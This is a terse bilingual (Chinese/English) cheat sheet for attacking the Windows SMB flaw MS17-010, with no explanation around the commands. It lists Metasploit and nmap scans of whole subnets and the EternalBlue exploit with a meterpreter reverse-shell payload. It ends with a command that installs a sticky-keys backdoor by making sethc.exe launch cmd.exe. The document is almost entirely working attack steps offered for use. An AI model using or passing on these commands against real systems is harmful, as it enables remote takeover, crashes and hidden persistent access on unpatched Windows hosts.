MS17 010
扫描
>use auxiliary/scanner/smb/smb_ms17_010
>set rhosts 192.168.1.0/24
&
>nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
攻击
>use exploit/windows/smb/ms_17_010_eternalblue易蓝屏
>set payload windows/x64/meterpreter/reverse_tcp
>use auxiliary/admin/smb/ms17_010_command
>set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f